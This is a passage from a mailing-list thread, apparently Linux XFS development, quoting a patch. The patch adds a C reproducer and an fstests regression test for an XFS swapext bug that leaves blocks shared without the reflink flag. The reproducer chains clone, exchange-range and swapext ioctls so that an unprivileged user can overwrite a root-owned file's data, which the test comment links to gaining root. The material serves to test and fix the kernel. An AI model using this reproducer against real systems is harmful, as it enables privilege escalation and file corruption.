>>> +#define FICLONERANGE _IOW(0x94, 13, struct file_clone_range)
>>> +#endif
>>> +
>>> +#ifndef XFS_EXCHANGE_RANGE_TO_EOF
>>> +struct xfs_exchange_range {
>>> + __s32 file1_fd;
>>> + __u32 pad;
>>> + __u64 file1_offset;
>>> + __u64 file2_offset;
>>> + __u64 length;
>>> + __u64 flags;
>>> +};
>>> +#define XFS_IOC_EXCHANGE_RANGE _IOW('X', 129, struct xfs_exchange_range)
>>> +#define XFS_EXCHANGE_RANGE_TO_EOF (1ULL << 0)
>>> +#endif
>>> +
>>> +#ifndef XFS_IOC_SWAPEXT
>>> +typedef struct xfs_bstime {
>>> + long tv_sec;
>>> + __s32 tv_nsec;
>>> +} xfs_bstime_t;
>>> +
>>> +struct xfs_bstat {
>>> + __u64 bs_ino;
>>> + __u16 bs_mode;
>>> + __u16 bs_nlink;
>>> + __u32 bs_uid;
>>> + __u32 bs_gid;
>>> + __u32 bs_rdev;
>>> + __s32 bs_blksize;
>>> + __s64 bs_size;
>>> + xfs_bstime_t bs_atime;
>>> + xfs_bstime_t bs_mtime;
>>> + xfs_bstime_t bs_ctime;
>>> + __s64 bs_blocks;
>>> + __u32 bs_xflags;
>>> + __s32 bs_extsize;
>>> + __s32 bs_extents;
>>> + __u32 bs_gen;
>>> + __u16 bs_projid_lo;
>>> + __u16 bs_forkoff;
>>> + __u16 bs_projid_hi;
>>> + __u16 bs_sick;
>>> + __u16 bs_checked;
>>> + unsigned char bs_pad[2];
>>> + __u32 bs_cowextsize;
>>> + __u32 bs_dmevmask;
>>> + __u16 bs_dmstate;
>>> + __u16 bs_aextents;
>>> +};
>>> +
>>> +struct xfs_swapext {
>>> + __s64 sx_version;
>>> +#define XFS_SX_VERSION 0
>>> + __s64 sx_fdtarget;
>>> + __s64 sx_fdtmp;
>>> + __s64 sx_offset;
>>> + __s64 sx_length;
>>> + char sx_pad[16];
>>> + struct xfs_bstat sx_stat;
>>> +};
>>> +#define XFS_IOC_SWAPEXT _IOWR('X', 109, struct xfs_swapext)
>>> +#endif
>>> +
>>> +static unsigned long blksz;
>>> +static int peer, f1;
>>> +
>>> +static unsigned long long phys(int fd, unsigned long long off)
>>> +{
>>> + struct { struct fiemap f; struct fiemap_extent e[1]; } q;
>>> +
>>> + memset(&q, 0, sizeof q);
>>> + q.f.fm_start = off;
>>> + q.f.fm_length = blksz;
>>> + q.f.fm_extent_count = 1;
>>> + if (ioctl(fd, FS_IOC_FIEMAP, &q.f) || q.f.fm_mapped_extents < 1)
>>> + return 0;
>>> + return (q.e[0].fe_physical + (off - q.e[0].fe_logical)) / blksz;
>>> +}
>>> +
>>> +static void show(const char *tag)
>>> +{
>>> + struct stat st;
>>> + int i;
>>> +
>>> + fstat(f1, &st);
>>> + printf("%-26s peer [%llu] file1 size %5lld [", tag, phys(peer, 0),
>>> + (long long)st.st_size);
>>> + for (i = 0; i < 3; i++)
>>> + printf("%llu%s", phys(f1, (unsigned long long)i * blksz),
>>> + i == 2 ? "]\n" : "] [");
>>> +}
>>> +
>>> +static int mkfile(const char *name, char fill, int blocks)
>>> +{
>>> + char *buf;
>>> + int fd;
>>> +
>>> + unlink(name);
>>> + fd = open(name, O_RDWR | O_CREAT | O_EXCL, 0600);
>>> + if (fd < 0)
>>> + return fprintf(stderr, "open %s: %m\n", name), -1;
>>> + buf = malloc(blocks * blksz);
>>> + memset(buf, fill, blocks * blksz);
>>> + if (pwrite(fd, buf, blocks * blksz, 0) != (ssize_t)(blocks * blksz))
>>> + return fprintf(stderr, "pwrite %s: %m\n", name), -1;
>>> + free(buf);
>>> + fsync(fd);
>>> + return fd;
>>> +}
>>> +
>>> +int main(int argc, char *argv[])
>>> +{
>>> + struct xfs_exchange_range xr;
>>> + struct file_clone_range cr;
>>> + struct xfs_swapext sx;
>>> + char before[65536], after[65536], *buf;
>>> + struct statfs sfs;
>>> + struct stat st;
>>> + int d1, d2;
>>> +
>>> + if (argc != 3) {
>>> + fprintf(stderr, "Usage: $0 dir path_to_peer\n");
>>> + return 2;
>>> + }
>>> +
>>> + if (chdir(argv[1]))
>>> + return perror(argv[1]), 2;
>>> +
>>> + if (statfs(".", &sfs))
>>> + return fprintf(stderr, "statfs: %m\n"), 2;
>>> + blksz = sfs.f_bsize;
>>> +
>>> + peer = open(argv[2], O_RDONLY);
>>> + if (peer < 0)
>>> + return fprintf(stderr, "open peer: %m\n"), 2;
>>> + fstat(peer, &st);
>>> + printf("peer uid %u mode %04o size %lld, block size %lu\n\n",
>>> + st.st_uid, st.st_mode & 07777, (long long)st.st_size, blksz);
>>> + if (pread(peer, before, blksz, 0) != (ssize_t)blksz)
>>> + return fprintf(stderr, "read peer: %m\n"), 2;
>>> + syncfs(peer); /* so FIEMAP reports peer's real block */
>>> +
>>> + f1 = mkfile("file1", 'A', 3);
>>> + d1 = mkfile("donor1", 'B', 1);
>>> + d2 = mkfile("donor2", 'C', 1);
>>> + if (f1 < 0 || d1 < 0 || d2 < 0)
>>> + return 2;
>>> + show("start");
>>> +
>>> + /* 1. share peer's block into the middle of file1 */
>>> + cr = (struct file_clone_range){ .src_fd = peer, .src_offset = 0,
>>> + .src_length = blksz,
>>> + .dest_offset = blksz };
>>> + if (ioctl(f1, FICLONERANGE, &cr))
>>> + return fprintf(stderr, "FICLONERANGE: %m\n"), 2;
>>> + show("1 FICLONERANGE");
>>> +
>>> + /*
>>> + * 2. exchange file1's last block against the whole of donor1 with
>>> + * TO_EOF. The sizes are exchanged too, so file1 claims one block
>>> + * while still owning three. file2_offset is block 2, so this exchange
>>> + * cannot clear a reflink flag.
>>> + */
>>> + xr = (struct xfs_exchange_range){ .file1_fd = d1, .file1_offset = 0,
>>> + .file2_offset = 2 * blksz,
>>> + .length = 0,
>>> + .flags = XFS_EXCHANGE_RANGE_TO_EOF };
>>> + if (ioctl(f1, XFS_IOC_EXCHANGE_RANGE, &xr))
>>> + return fprintf(stderr, "EXCHANGE_RANGE TO_EOF: %m\n"), 2;
>>> + show("2 EXCHANGE_RANGE TO_EOF");
>>> +
>>> + /*
>>> + * 3. XFS_IOC_SWAPEXT with file1 as the target. sx_offset is 0 and
>>> + * sx_length equals both inodes' i_disk_size, so the "Verify all data
>>> + * are being swapped" test passes. xfs_swap_extent_rmap() then bounds
>>> + * its remap loop with XFS_B_TO_FSB(mp, i_size_read(VFS_I(ip))), which
>>> + * is one block, so file1's two mappings above its size are left in
>>> + * place -- and the reflink flags are swapped anyway, clearing file1's.
>>> + */
>>> + fsync(f1);
>>> + fsync(d2);
>>> + if (fstat(f1, &st))
>>> + return fprintf(stderr, "fstat file1: %m\n"), 2;
>>> + memset(&sx, 0, sizeof sx);
>>> + sx.sx_version = XFS_SX_VERSION;
>>> + sx.sx_fdtarget = f1;
>>> + sx.sx_fdtmp = d2;
>>> + sx.sx_offset = 0;
>>> + sx.sx_length = st.st_size;
>>> + sx.sx_stat.bs_mtime.tv_sec = st.st_mtim.tv_sec;
>>> + sx.sx_stat.bs_mtime.tv_nsec = st.st_mtim.tv_nsec;
>>> + sx.sx_stat.bs_ctime.tv_sec = st.st_ctim.tv_sec;
>>> + sx.sx_stat.bs_ctime.tv_nsec = st.st_ctim.tv_nsec;
>>> + if (ioctl(f1, XFS_IOC_SWAPEXT, &sx))
>>> + return fprintf(stderr, "SWAPEXT: %m\n"), 2;
>>> + show("3 SWAPEXT");
>>> +
>>> + /* 4. write to the block file1 still shares with peer */
>>> + buf = malloc(blksz);
>>> + memset(buf, 'X', blksz);
>>> + if (pwrite(f1, buf, blksz, blksz) != (ssize_t)blksz)
>>> + return fprintf(stderr, "pwrite: %m\n"), 2;
>>> + fsync(f1);
>>> + show("4 pwrite(file1, 4096)");
>>> +
>>> + posix_fadvise(peer, 0, 0, POSIX_FADV_DONTNEED);
>>> + if (pread(peer, after, blksz, 0) != (ssize_t)blksz)
>>> + return fprintf(stderr, "re-read peer: %m\n"), 2;
>>> + printf("\npeer first byte %c -> %c %s\n", before[0], after[0],
>>> + memcmp(before, after, blksz) ? "PEER REWRITTEN" : "peer intact");
>>> + return memcmp(before, after, blksz) ? 0 : 1;
>>> +}
>>> +
>>> +
>>> diff --git a/tests/xfs/1939 b/tests/xfs/1939
>>> new file mode 100755
>>> index 00000000000000..b08ea09e977628
>>> --- /dev/null
>>> +++ b/tests/xfs/1939
>>> @@ -0,0 +1,69 @@
>>> +#! /bin/bash
>>> +# SPDX-License-Identifier: GPL-2.0
>>> +# Copyright (c) 2026 Oracle. All Rights Reserved.
>>> +#
>>> +# FS QA Test No. 1939
>>> +#
>>> +# Regression test for an swapext bug which unintentionally results in files
>>> +# that share data blocks but don't have the reflink flag set. This enables
>>> +# attackers to rewrite shared blocks to gain root privileges, similar to
>>> +# refluxfs.
>>> +. ./common/preamble
>>> +_begin_fstest auto quick swapext
>>> +
>>> +. ./common/filter
>>> +. ./common/reflink
>>> +
>>> +_require_test_program "xfs-swapext-reflink"
>>> +_require_user fsgqa
>>> +_require_group fsgqa
>>> +_require_scratch_reflink
>>> +_require_xfs_scratch_rmapbt
>>> +_require_cp_reflink
>>> +
>>> +_fixed_by_fs_commit xfs XXXXXXXXXXXXXX \
>>> + "xfs: stop exchanging reflink flags when exchanging mappings"
>>> +
>>> +_scratch_mkfs >> $seqres.full
>>> +_scratch_mount
>>> +
>>> +rootdir=$SCRATCH_MNT/root
>>> +userdir1=$SCRATCH_MNT/user1
>>> +blksz=$(_get_file_block_size $SCRATCH_MNT)
>>> +
>>> +# Fill $mnt/peer with "P", run reproducer program
>>> +mkdir -p $rootdir $userdir1
>>> +$XFS_IO_PROG -f -c "pwrite -S 0x50 0 $blksz" $rootdir/peer.copy >> $seqres.full
>>> +$XFS_IO_PROG -f -c "pwrite -S 0x50 0 $blksz" $rootdir/peer1 >> $seqres.full
>>> +sync
>>> +
>>> +chown $qa_user:$qa_group $userdir1
>>> +chmod +r $rootdir/peer1
>>> +
>>> +_su $qa_user -c "$here/src/xfs-swapext-reflink $userdir1 $rootdir/peer1" &> $tmp.out1
>>> +
>>> +echo "Errors from reproducer:" >> $seqres.full
>>> +cat $tmp.out1 >> $seqres.full
>>> +
>>> +# Check for file corruption
>>> +grep -q REWRITTEN $tmp.out1 && \
>>> + echo "$rootdir/peer1 rewritten, filesystem corrupt!"
>>> +
>>> +cmp -s $rootdir/peer.copy $rootdir/peer1 || \
>>> + echo "$rootdir/peer1 changed since its snapshot, filesystem corrupt!"
>>> +
>>> +# Check reflink flags
>>> +_scratch_unmount
>>> +_scratch_xfs_db \
>>> + -c "path /user1/file1" -c 'print' \
>>> + | grep v3.reflink
>>> +_scratch_mount
>>> +
>>> +# Check for file corruption now that we've blown away all caches
>>> +grep -q REWRITTEN $tmp.out1 && \
>>> + echo "$rootdir/peer1 rewritten, filesystem corrupt!"
>>> +
>>> +cmp -s $rootdir/peer.copy $rootdir/peer1 || \
>>> + echo "$rootdir/peer1 changed since its snapshot, filesystem corrupt!"
>>> +
>>> +_exit 0
>>> diff --git a/tests/xfs/1939.out b/tests/xfs/1939.out
>>> new file mode 100644
>>> index 00000000000000..ad52293f986ac6
>>> --- /dev/null
>>> +++ b/tests/xfs/1939.out
>>> @@ -0,0 +1,2 @@
>>> +QA output created by 1939
>>> +v3.reflink = 1
>>>
>>
>
^ permalink raw reply [flat|nested] 8+ messages in thread
end of thread, other threads:[~2026-10-10 6:09 UTC | newest]
Thread overview: 8+ messages (download: mbox.gz follow: Atom feed
-- links below jump to the message on this page --
2026-10-07 17:02 [PATCH v2] xfs: fix exchange-range-to-eof file size exchange Darrick J. Wong
2026-10-07 17:04 ` [PATCH] xfs: add regression test for exchangerange-to-eof reflux Darrick J. Wong
2026-10-07 17:05 ` [PATCH] xfs: add regression test for swapext reflux Darrick J. Wong
2026-10-09 16:13 ` Eric Sandeen
2026-10-09 22:11 ` Darrick J. Wong
2026-10-10 6:09 ` Eric Sandeen
2026-10-07 20:35 ` [PATCH v2] xfs: fix exchange-range-to-eof file size exchange Dave Chinner
-- strict thread matches above, loose matches on Subject: below --
2026-10-06 5:09 [PATCH] " Darrick J. Wong
2026-10-06 6:15 ` [PATCH] xfs: add regression test for exchangerange-to-eof reflux Darrick J. Wong
This is a public inbox, see mirroring instructions
for how to clone and mirror all data and code used for this inbox